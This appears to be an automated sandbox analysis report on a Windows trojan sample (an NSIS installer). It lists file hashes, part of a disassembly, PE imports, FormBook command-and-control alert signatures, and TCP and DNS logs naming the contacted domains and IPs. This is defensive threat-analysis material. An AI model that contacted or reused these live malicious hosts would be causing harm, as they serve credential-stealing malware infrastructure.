                                                                    SSDEEP:96:Farc6oY7g/DrYu+k2XO5oSwYiAVW9aRDGDprAhThqwDQgNDQXzL2gf:FarcRfWhX1S9H9tGlg9h3hgf
                                                                    MD5:EE48E241B19CF476BAB747E7BFFBE1E6
                                                                    SHA1:ECD535B070BAC75909809590AE8CEE602A65F8FF
                                                                    SHA-256:2F25ECE58FD26C56F04DCDCDA1273E75D2101A78FD0717605F0148ADEA9E83EA
                                                                    SHA-512:2ED2C6059DD18824BE7B217023A78B4FDCE37424D1C1949E896B4C311C16F084B86DC7178C06174A5ECC5988653AC97CB9B67307A6B766166BABC063B942AD57
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):326683
                                                                    Entropy (8bit):7.56585074937259
                                                                    Encrypted:false
                                                                    SSDEEP:6144:llDH7L09bR9XjKk1c85uxmCum7ZjmOLPzCu/GZVZxML7L26P:llnL0w0cxxmidCODzCu/QZOL2
                                                                    MD5:DB1F24D7DE5473B1FEB30958D5620614
                                                                    SHA1:956E2FCB636FBA3FEFC9EBFCA96CCEC7605B252B
                                                                    SHA-256:A635BBBC73BA851204F9242C529EF59C9C1A133D1A98D8BCBFE1B0161216400B
                                                                    SHA-512:35D949222412B4CA343454A4CE247067C3A74B5CB4CCA3FFEAA0C0F7AE5734C82D6E552FB1EBB984A4953EA760F24BBF5C249B83FE3C85959AB78E6625F0B642
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):211481
                                                                    Entropy (8bit):7.998948076055924
                                                                    Encrypted:true
                                                                    SSDEEP:3072:mKd38ED05C8QZ/bLX8NWvByZA6XRxnIGb/D/Kk7iVSc8k1wPuxD6QH+0gZm7IKjS:hlDH7L09bR9XjKk1c85uxmCum7ZjmOLy
                                                                    MD5:4C2A176B3C04DB72501ED445A646E276
                                                                    SHA1:26C8DCB493EB56374B0A96D5453BB535F7A515CC
                                                                    SHA-256:F9713AB900F44015FD669DF94861D50D98281D447964913B0132E1CAC002351B
                                                                    SHA-512:B0673860453637C95F09AE4766DBB10B5DFA0282D48B0B351EE8231C304C08EEADC721E8A64C941462E93C175431CECBE5F9530C2A5FDF937ADE42FCE3FA0ED5
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe
                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):95232
                                                                    Entropy (8bit):6.23150349499231
                                                                    Encrypted:false
                                                                    SSDEEP:1536:opZrDPCXLdr7zQN/GZGLaYeZjtBaKaedCRVLR8dpxekydJrD9iiU71aC4sWBlVmI:oHTCB7Y/GZGPeZxaGCRVLR9kydI7sCUJ
                                                                    MD5:6D30D26416D626447BA4298A59111F6D
                                                                    SHA1:C7F0941793929D391369F59FD92FFD4B2DC5C598
                                                                    SHA-256:C53E0E6337805EC801493437F7811672A1B3C187611799116D5490AB2E63B1EC
                                                                    SHA-512:79946C7F1D3F1F9A56ED7A3F6BCA739F73801B6BCEFB6CC41945BE28A4542A1FD511D52269A61DB887CD2DF42D8B87D7E497295FDBC9E226B25FDB745DF7940F
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 39%
                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                    Entropy (8bit):7.926529383010501
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe
                                                                    File size:299717
                                                                    MD5:c7714b273571ba64c0b77afca236ac6d
                                                                    SHA1:c24d9460bee8a724abe8b0dcf3d74851dd5737ed
                                                                    SHA256:e62c1e809c48e66104c34ae3e977b82fbea2e984dee708bda431b608c2774c28
                                                                    SHA512:e70d15e6d9e318e509013088a42f02c2298af5f85ca91c8463f1fb7fc3d5216ec7ef6e9a8c343f95f5a0b457260014d8c15c5e0b7e8d1a050c3963618adb159e
                                                                    SSDEEP:6144:vYa69KnJK2Vi0/1olkMjLow/9AO3xVFLFlXT+rcYGRleg3Cdl2xHW7:vYnKndVJAnow/6O3xV5TD+rcYCKyy
                                                                    TLSH:435412A63178C03BF5A141306F7512AA9EFDDA1278F90A0B4B901B6D7F7AB14650F393
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*.....
                                                                    Icon Hash:b2a88c96b2ca6a72
                                                                    Entrypoint:0x403640
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x614F9B1F [Sat Sep 25 21:56:47 2021 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 61259b55b8912888e90f516ca08dc514

Instruction
push ebp
mov ebp, esp
sub esp, 000003F4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [ebp-14h], ebx
mov dword ptr [ebp-04h], 0040A230h
mov dword ptr [ebp-10h], ebx
call dword ptr [004080C8h]
mov esi, dword ptr [004080CCh]
lea eax, dword ptr [ebp-00000140h]
push eax
mov dword ptr [ebp-0000012Ch], ebx
mov dword ptr [ebp-2Ch], ebx
mov dword ptr [ebp-28h], ebx
mov dword ptr [ebp-00000140h], 0000011Ch
call esi
test eax, eax
jne 00007F57DC75144Ah
lea eax, dword ptr [ebp-00000140h]
mov dword ptr [ebp-00000140h], 00000114h
push eax
call esi
mov ax, word ptr [ebp-0000012Ch]
mov ecx, dword ptr [ebp-00000112h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [ebp-26h], 00000004h
not eax
and eax, ecx
mov word ptr [ebp-2Ch], ax
cmp dword ptr [ebp-0000013Ch], 0Ah
jnc 00007F57DC75141Ah
and word ptr [ebp-00000132h], 0000h
mov eax, dword ptr [ebp-00000134h]
movzx ecx, byte ptr [ebp-00000138h]
mov dword ptr [0042A318h], eax
xor eax, eax
mov ah, byte ptr [ebp-0000013Ch]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [ebp-2Ch]
movzx ecx, cx
shl eax, 10h
or eax, ecx

Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x8504           0xa0          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x3b000          0xcd8         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x8000           0x2b0         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity     File Type  Entropy             Characteristics
.text   0x1000           0x6676        0x6800    False     0.6568134014423077  data       6.4174599871908855  IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata  0x8000           0x139a        0x1400    False     0.4498046875        data       5.141066817170598   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0xa000           0x20378       0x600     False     0.509765625         data       4.110582127654237   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata  0x2b000          0x10000       0x0       False     0                   empty      0.0                 IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc   0x3b000          0xcd8         0xe00     False     0.4224330357142857  data       4.230532221238809   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name           RVA      Size   Type                                                                                Language  Country
RT_ICON        0x3b1d8  0x2e8  Device independent bitmap graphic, 32 x 64 x 4, image size 640                      English   United States
RT_DIALOG      0x3b4c0  0x100  data                                                                                English   United States
RT_DIALOG      0x3b5c0  0x11c  data                                                                                English   United States
RT_DIALOG      0x3b6e0  0x60   data                                                                                English   United States
RT_GROUP_ICON  0x3b740  0x14   data                                                                                English   United States
RT_VERSION     0x3b758  0x240  data                                                                                English   United States
RT_MANIFEST    0x3b998  0x33e  XML 1.0 document, ASCII text, with very long lines (830), with no line terminators  English   United States
DLL           Imports
ADVAPI32.dll  RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
SHELL32.dll   SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
ole32.dll     OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
COMCTL32.dll  ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll    GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
GDI32.dll     SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll  GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
Language of compilation system  Country where language is spoken
English                         United States
Timestamp                 Protocol  SID      Message                               Source Port  Dest Port  Source IP    Dest IP
03/20/23-17:00:09.343542  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49702        80         192.168.2.4  91.195.240.94
03/20/23-17:00:25.955923  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49706        80         192.168.2.4  81.17.18.198
03/20/23-17:00:25.955923  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49706        80         192.168.2.4  81.17.18.198
03/20/23-16:59:46.201874  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49696        80         192.168.2.4  94.176.104.86
03/20/23-17:00:09.343542  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49702        80         192.168.2.4  91.195.240.94
03/20/23-16:59:46.201874  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49696        80         192.168.2.4  94.176.104.86
03/20/23-17:00:09.343542  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49702        80         192.168.2.4  91.195.240.94
03/20/23-16:59:46.201874  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49696        80         192.168.2.4  94.176.104.86
03/20/23-17:00:25.955923  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49706        80         192.168.2.4  81.17.18.198
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Mar 20, 2023 16:59:46.164385080 CET4969680192.168.2.494.176.104.86
                                                                    Mar 20, 2023 16:59:46.201606989 CET804969694.176.104.86192.168.2.4
                                                                    Mar 20, 2023 16:59:46.201721907 CET4969680192.168.2.494.176.104.86
                                                                    Mar 20, 2023 16:59:46.201874018 CET4969680192.168.2.494.176.104.86
                                                                    Mar 20, 2023 16:59:46.239142895 CET804969694.176.104.86192.168.2.4
                                                                    Mar 20, 2023 16:59:46.439270973 CET804969694.176.104.86192.168.2.4
                                                                    Mar 20, 2023 16:59:46.439304113 CET804969694.176.104.86192.168.2.4
                                                                    Mar 20, 2023 16:59:46.439450979 CET4969680192.168.2.494.176.104.86
                                                                    Mar 20, 2023 16:59:46.439614058 CET4969680192.168.2.494.176.104.86
                                                                    Mar 20, 2023 16:59:46.476691008 CET804969694.176.104.86192.168.2.4
                                                                    Mar 20, 2023 16:59:51.479353905 CET4969780192.168.2.478.141.192.145
                                                                    Mar 20, 2023 16:59:51.508332968 CET804969778.141.192.145192.168.2.4
                                                                    Mar 20, 2023 16:59:51.510864019 CET4969780192.168.2.478.141.192.145
                                                                    Mar 20, 2023 16:59:51.510987997 CET4969780192.168.2.478.141.192.145
                                                                    Mar 20, 2023 16:59:51.538568974 CET804969778.141.192.145192.168.2.4
                                                                    Mar 20, 2023 16:59:51.538933992 CET804969778.141.192.145192.168.2.4
                                                                    Mar 20, 2023 16:59:51.539037943 CET804969778.141.192.145192.168.2.4
                                                                    Mar 20, 2023 16:59:51.539123058 CET4969780192.168.2.478.141.192.145
                                                                    Mar 20, 2023 16:59:53.025367975 CET4969780192.168.2.478.141.192.145
                                                                    Mar 20, 2023 16:59:54.043806076 CET4969880192.168.2.478.141.192.145
                                                                    Mar 20, 2023 16:59:54.071490049 CET804969878.141.192.145192.168.2.4
                                                                    Mar 20, 2023 16:59:54.071722031 CET4969880192.168.2.478.141.192.145
                                                                    Mar 20, 2023 16:59:54.072148085 CET4969880192.168.2.478.141.192.145
                                                                    Mar 20, 2023 16:59:54.099571943 CET804969878.141.192.145192.168.2.4
                                                                    Mar 20, 2023 16:59:54.099611998 CET804969878.141.192.145192.168.2.4
                                                                    Mar 20, 2023 16:59:54.099633932 CET804969878.141.192.145192.168.2.4
                                                                    Mar 20, 2023 16:59:54.099822998 CET4969880192.168.2.478.141.192.145
                                                                    Mar 20, 2023 16:59:54.100164890 CET4969880192.168.2.478.141.192.145
                                                                    Mar 20, 2023 16:59:54.127706051 CET804969878.141.192.145192.168.2.4
                                                                    Mar 20, 2023 16:59:59.126749039 CET4969980192.168.2.4161.97.163.8
                                                                    Mar 20, 2023 16:59:59.153734922 CET8049699161.97.163.8192.168.2.4
                                                                    Mar 20, 2023 16:59:59.153947115 CET4969980192.168.2.4161.97.163.8
                                                                    Mar 20, 2023 16:59:59.154143095 CET4969980192.168.2.4161.97.163.8
                                                                    Mar 20, 2023 16:59:59.181529999 CET8049699161.97.163.8192.168.2.4
                                                                    Mar 20, 2023 16:59:59.182496071 CET8049699161.97.163.8192.168.2.4
                                                                    Mar 20, 2023 16:59:59.182528019 CET8049699161.97.163.8192.168.2.4
                                                                    Mar 20, 2023 16:59:59.182634115 CET4969980192.168.2.4161.97.163.8
                                                                    Mar 20, 2023 17:00:00.666766882 CET4969980192.168.2.4161.97.163.8
                                                                    Mar 20, 2023 17:00:01.683223009 CET4970080192.168.2.4161.97.163.8
                                                                    Mar 20, 2023 17:00:01.707376957 CET8049700161.97.163.8192.168.2.4
                                                                    Mar 20, 2023 17:00:01.707633018 CET4970080192.168.2.4161.97.163.8
                                                                    Mar 20, 2023 17:00:01.707849026 CET4970080192.168.2.4161.97.163.8
                                                                    Mar 20, 2023 17:00:01.731712103 CET8049700161.97.163.8192.168.2.4
                                                                    Mar 20, 2023 17:00:01.732481956 CET8049700161.97.163.8192.168.2.4
                                                                    Mar 20, 2023 17:00:01.732547998 CET8049700161.97.163.8192.168.2.4
                                                                    Mar 20, 2023 17:00:01.732713938 CET4970080192.168.2.4161.97.163.8
                                                                    Mar 20, 2023 17:00:01.732954979 CET4970080192.168.2.4161.97.163.8
                                                                    Mar 20, 2023 17:00:01.756808043 CET8049700161.97.163.8192.168.2.4
                                                                    Mar 20, 2023 17:00:06.786604881 CET4970180192.168.2.491.195.240.94
                                                                    Mar 20, 2023 17:00:06.806010008 CET804970191.195.240.94192.168.2.4
                                                                    Mar 20, 2023 17:00:06.807351112 CET4970180192.168.2.491.195.240.94
                                                                    Mar 20, 2023 17:00:06.807351112 CET4970180192.168.2.491.195.240.94
                                                                    Mar 20, 2023 17:00:06.827474117 CET804970191.195.240.94192.168.2.4
                                                                    Mar 20, 2023 17:00:06.827512026 CET804970191.195.240.94192.168.2.4
                                                                    Mar 20, 2023 17:00:06.832981110 CET4970180192.168.2.491.195.240.94
                                                                    Mar 20, 2023 17:00:08.308280945 CET4970180192.168.2.491.195.240.94
                                                                    Mar 20, 2023 17:00:09.324009895 CET4970280192.168.2.491.195.240.94
                                                                    Mar 20, 2023 17:00:09.343242884 CET804970291.195.240.94192.168.2.4
                                                                    Mar 20, 2023 17:00:09.343389988 CET4970280192.168.2.491.195.240.94
                                                                    Mar 20, 2023 17:00:09.343542099 CET4970280192.168.2.491.195.240.94
                                                                    Mar 20, 2023 17:00:09.394530058 CET804970291.195.240.94192.168.2.4
                                                                    Mar 20, 2023 17:00:09.394562960 CET804970291.195.240.94192.168.2.4
                                                                    Mar 20, 2023 17:00:09.394582987 CET804970291.195.240.94192.168.2.4
                                                                    Mar 20, 2023 17:00:09.394602060 CET804970291.195.240.94192.168.2.4
                                                                    Mar 20, 2023 17:00:09.394620895 CET804970291.195.240.94192.168.2.4
                                                                    Mar 20, 2023 17:00:09.394639969 CET804970291.195.240.94192.168.2.4
                                                                    Mar 20, 2023 17:00:09.394659042 CET804970291.195.240.94192.168.2.4
                                                                    Mar 20, 2023 17:00:09.394673109 CET804970291.195.240.94192.168.2.4
                                                                    Mar 20, 2023 17:00:09.394748926 CET804970291.195.240.94192.168.2.4
                                                                    Mar 20, 2023 17:00:09.394779921 CET4970280192.168.2.491.195.240.94
                                                                    Mar 20, 2023 17:00:09.394840002 CET804970291.195.240.94192.168.2.4
                                                                    Mar 20, 2023 17:00:09.394848108 CET4970280192.168.2.491.195.240.94
                                                                    Mar 20, 2023 17:00:09.394885063 CET4970280192.168.2.491.195.240.94
                                                                    Mar 20, 2023 17:00:09.413861036 CET804970291.195.240.94192.168.2.4
                                                                    Mar 20, 2023 17:00:09.413888931 CET804970291.195.240.94192.168.2.4
                                                                    Mar 20, 2023 17:00:09.413908958 CET804970291.195.240.94192.168.2.4
                                                                    Mar 20, 2023 17:00:09.413927078 CET804970291.195.240.94192.168.2.4
                                                                    Mar 20, 2023 17:00:09.413945913 CET804970291.195.240.94192.168.2.4
                                                                    Mar 20, 2023 17:00:09.413964033 CET804970291.195.240.94192.168.2.4
                                                                    Mar 20, 2023 17:00:09.413973093 CET4970280192.168.2.491.195.240.94
                                                                    Mar 20, 2023 17:00:09.413983107 CET804970291.195.240.94192.168.2.4
                                                                    Mar 20, 2023 17:00:09.414005041 CET804970291.195.240.94192.168.2.4
                                                                    Mar 20, 2023 17:00:09.414017916 CET4970280192.168.2.491.195.240.94
                                                                    Mar 20, 2023 17:00:09.414125919 CET4970280192.168.2.491.195.240.94
                                                                    Mar 20, 2023 17:00:09.414351940 CET4970280192.168.2.491.195.240.94
                                                                    Mar 20, 2023 17:00:09.433420897 CET804970291.195.240.94192.168.2.4
                                                                    Mar 20, 2023 17:00:15.521128893 CET4970380192.168.2.4213.145.228.111
                                                                    Mar 20, 2023 17:00:15.542534113 CET8049703213.145.228.111192.168.2.4
                                                                    Mar 20, 2023 17:00:15.542710066 CET4970380192.168.2.4213.145.228.111
                                                                    Mar 20, 2023 17:00:15.542984962 CET4970380192.168.2.4213.145.228.111
                                                                    Mar 20, 2023 17:00:15.564192057 CET8049703213.145.228.111192.168.2.4
                                                                    Mar 20, 2023 17:00:15.750376940 CET8049703213.145.228.111192.168.2.4
                                                                    Mar 20, 2023 17:00:15.750427961 CET8049703213.145.228.111192.168.2.4
                                                                    Mar 20, 2023 17:00:15.750452995 CET8049703213.145.228.111192.168.2.4
                                                                    Mar 20, 2023 17:00:15.750571012 CET4970380192.168.2.4213.145.228.111
                                                                    Mar 20, 2023 17:00:15.758713961 CET8049703213.145.228.111192.168.2.4
                                                                    Mar 20, 2023 17:00:15.758759975 CET8049703213.145.228.111192.168.2.4
                                                                    Mar 20, 2023 17:00:15.758881092 CET4970380192.168.2.4213.145.228.111
                                                                    Mar 20, 2023 17:00:17.061141014 CET4970380192.168.2.4213.145.228.111
                                                                    Mar 20, 2023 17:00:18.075567007 CET4970480192.168.2.4213.145.228.111
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Mar 20, 2023 16:59:46.136440992 CET5657253192.168.2.48.8.8.8
                                                                    Mar 20, 2023 16:59:46.156369925 CET53565728.8.8.8192.168.2.4
                                                                    Mar 20, 2023 16:59:51.451244116 CET5091153192.168.2.48.8.8.8
                                                                    Mar 20, 2023 16:59:51.474733114 CET53509118.8.8.8192.168.2.4
                                                                    Mar 20, 2023 16:59:59.107836008 CET5968353192.168.2.48.8.8.8
                                                                    Mar 20, 2023 16:59:59.125689983 CET53596838.8.8.8192.168.2.4
                                                                    Mar 20, 2023 17:00:06.763504028 CET6416753192.168.2.48.8.8.8
                                                                    Mar 20, 2023 17:00:06.785231113 CET53641678.8.8.8192.168.2.4
                                                                    Mar 20, 2023 17:00:15.491092920 CET5856553192.168.2.48.8.8.8
                                                                    Mar 20, 2023 17:00:15.519546032 CET53585658.8.8.8192.168.2.4
                                                                    Mar 20, 2023 17:00:23.355577946 CET5223953192.168.2.48.8.8.8
                                                                    Mar 20, 2023 17:00:23.388257980 CET53522398.8.8.8192.168.2.4
                                                                    Mar 20, 2023 17:00:31.040029049 CET5680753192.168.2.48.8.8.8
                                                                    Mar 20, 2023 17:00:31.183070898 CET53568078.8.8.8192.168.2.4
                                                                    Mar 20, 2023 17:00:39.271570921 CET6100753192.168.2.48.8.8.8
                                                                    Mar 20, 2023 17:00:39.320899963 CET53610078.8.8.8192.168.2.4
                                                                    Mar 20, 2023 17:00:47.549798012 CET6068653192.168.2.48.8.8.8
                                                                    Mar 20, 2023 17:00:47.680247068 CET53606868.8.8.8192.168.2.4
                                                                    Mar 20, 2023 17:00:56.317701101 CET6112453192.168.2.48.8.8.8
                                                                    Mar 20, 2023 17:00:56.368645906 CET53611248.8.8.8192.168.2.4
                                                                    Mar 20, 2023 17:00:57.380626917 CET5944453192.168.2.48.8.8.8
                                                                    Mar 20, 2023 17:00:57.408945084 CET53594448.8.8.8192.168.2.4
                                                                    Mar 20, 2023 17:01:02.477611065 CET5557053192.168.2.48.8.8.8
                                                                    Mar 20, 2023 17:01:02.627077103 CET53555708.8.8.8192.168.2.4
                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Mar 20, 2023 16:59:46.136440992 CET192.168.2.48.8.8.80x7d04Standard query (0)www.white-hat.ukA (IP address)IN (0x0001)false
                                                                    Mar 20, 2023 16:59:51.451244116 CET192.168.2.48.8.8.80xcb57Standard query (0)www.gritslab.comA (IP address)IN (0x0001)false
                                                                    Mar 20, 2023 16:59:59.107836008 CET192.168.2.48.8.8.80x9da5Standard query (0)www.bitservicesltd.comA (IP address)IN (0x0001)false
                                                                    Mar 20, 2023 17:00:06.763504028 CET192.168.2.48.8.8.80xf43cStandard query (0)www.222ambking.orgA (IP address)IN (0x0001)false
                                                                    Mar 20, 2023 17:00:15.491092920 CET192.168.2.48.8.8.80x4b72Standard query (0)www.energyservicestation.comA (IP address)IN (0x0001)false
                                                                    Mar 20, 2023 17:00:23.355577946 CET192.168.2.48.8.8.80xe0bcStandard query (0)www.younrock.comA (IP address)IN (0x0001)false
                                                                    Mar 20, 2023 17:00:31.040029049 CET192.168.2.48.8.8.80x5edbStandard query (0)www.thewildphotographer.co.ukA (IP address)IN (0x0001)false
                                                                    Mar 20, 2023 17:00:39.271570921 CET192.168.2.48.8.8.80x317eStandard query (0)www.shapshit.xyzA (IP address)IN (0x0001)false
                                                                    Mar 20, 2023 17:00:47.549798012 CET192.168.2.48.8.8.80x692bStandard query (0)www.thedivinerudraksha.comA (IP address)IN (0x0001)false
                                                                    Mar 20, 2023 17:00:56.317701101 CET192.168.2.48.8.8.80x95e7Standard query (0)www.fclaimrewardccpointq.shopA (IP address)IN (0x0001)false
                                                                    Mar 20, 2023 17:00:57.380626917 CET192.168.2.48.8.8.80x29b0Standard query (0)www.fclaimrewardccpointq.shopA (IP address)IN (0x0001)false
                                                                    Mar 20, 2023 17:01:02.477611065 CET192.168.2.48.8.8.80xbf61Standard query (0)www.un-object.comA (IP address)IN (0x0001)false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 20, 2023 16:59:46.156369925 CET | 8.8.8.8 | 192.168.2.4 | 0x7d04 | No error (0) | www.white-hat.uk | white-hat.uk | | CNAME (Canonical name) | IN (0x0001) | false
Mar 20, 2023 16:59:46.156369925 CET | 8.8.8.8 | 192.168.2.4 | 0x7d04 | No error (0) | white-hat.uk | | 94.176.104.86 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 16:59:51.474733114 CET | 8.8.8.8 | 192.168.2.4 | 0xcb57 | No error (0) | www.gritslab.com | gritslab.com | | CNAME (Canonical name) | IN (0x0001) | false
Mar 20, 2023 16:59:51.474733114 CET | 8.8.8.8 | 192.168.2.4 | 0xcb57 | No error (0) | gritslab.com | | 78.141.192.145 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 16:59:59.125689983 CET | 8.8.8.8 | 192.168.2.4 | 0x9da5 | No error (0) | www.bitservicesltd.com | | 161.97.163.8 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 17:00:06.785231113 CET | 8.8.8.8 | 192.168.2.4 | 0xf43c | No error (0) | www.222ambking.org | | 91.195.240.94 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 17:00:15.519546032 CET | 8.8.8.8 | 192.168.2.4 | 0x4b72 | No error (0) | www.energyservicestation.com | | 213.145.228.111 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 17:00:23.388257980 CET | 8.8.8.8 | 192.168.2.4 | 0xe0bc | No error (0) | www.younrock.com | | 81.17.18.198 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 17:00:31.183070898 CET | 8.8.8.8 | 192.168.2.4 | 0x5edb | No error (0) | www.thewildphotographer.co.uk | | 45.33.30.197 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 17:00:31.183070898 CET | 8.8.8.8 | 192.168.2.4 | 0x5edb | No error (0) | www.thewildphotographer.co.uk | | 45.79.19.196 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 17:00:31.183070898 CET | 8.8.8.8 | 192.168.2.4 | 0x5edb | No error (0) | www.thewildphotographer.co.uk | | 45.56.79.23 | A (IP address) | IN (0x0001) | false
